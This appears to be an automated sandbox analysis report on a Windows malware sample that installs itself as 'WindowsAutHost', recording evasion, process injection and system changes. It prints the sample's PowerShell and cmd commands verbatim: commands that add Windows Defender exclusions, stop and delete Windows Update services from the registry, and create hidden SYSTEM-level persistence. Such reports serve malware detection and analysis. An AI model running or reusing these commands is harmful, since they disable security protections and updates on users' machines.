    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Query firmware table information (likely to detect VMs)
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostSystem information queried: FirmwareTableInformationJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: 8iTXwpHCHb.exe, 00000000.00000002.417944318.000000EDA1DFB000.00000004.00000010.00020000.00000000.sdmp, 8iTXwpHCHb.exe, 00000000.00000002.418282136.000001EE3AB58000.00000004.00000020.00020000.00000000.sdmp, WindowsAutHost, 00000020.00000002.578161862.00000027C2FFB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
    Source: WindowsAutHost, 00000020.00000002.578694342.0000013605EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL4L&
    Tries to evade analysis by execution special instruction (VM detection)
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeSpecial instruction interceptor: First address: 00007FF6D3E06A75 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
    Source: C:\Program Files\WindowsServices\WindowsAutHostSpecial instruction interceptor: First address: 00007FF621856A75 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 9647 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep count: 9060 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4184Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep count: 7550 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 644Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep count: 9026 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3860Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep count: 9330 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep count: 820 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Program Files\WindowsServices\WindowsAutHostDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9647Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9060Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7550Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9026
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9330
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 820
    Source: C:\Windows\System32\conhost.exeAPI coverage: 4.8 %
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: ModuleAnalysisCache.7.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.7.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.7.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935E1170 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,58_2_00007FF6935E1170
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C3C40 GetFileSize,GetProcessHeap,HeapAlloc,58_2_00007FF6935C3C40
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,58_2_00007FF6935C1190

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Maps a DLL or memory area into another process
    Source: C:\Program Files\WindowsServices\WindowsAutHostSection loaded: C:\Windows\Temp\34E5.tmp target: C:\Windows\System32\conhost.exe protection: readonlyJump to behavior
    Writes to foreign memory regions
    Source: C:\Program Files\WindowsServices\WindowsAutHostMemory written: C:\Windows\System32\conhost.exe base: CBAAEEE010Jump to behavior
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Program Files\WindowsServices\WindowsAutHostThread register set: target process: 2968Jump to behavior
    Adds a directory exclusion to Windows Defender
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "windowsauthost" } else { "c:\program files\windowsservices\windowsauthost" }
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /fJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "windowsauthost" } else { "c:\program files\windowsservices\windowsauthost" }Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /fJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'windowsauthost' /tr '''c:\program files\windowsservices\windowsauthost'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsservices\windowsauthost') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'windowsauthost' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "windowsauthost" /t reg_sz /f /d 'c:\program files\windowsservices\windowsauthost' }Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHostJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdqJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
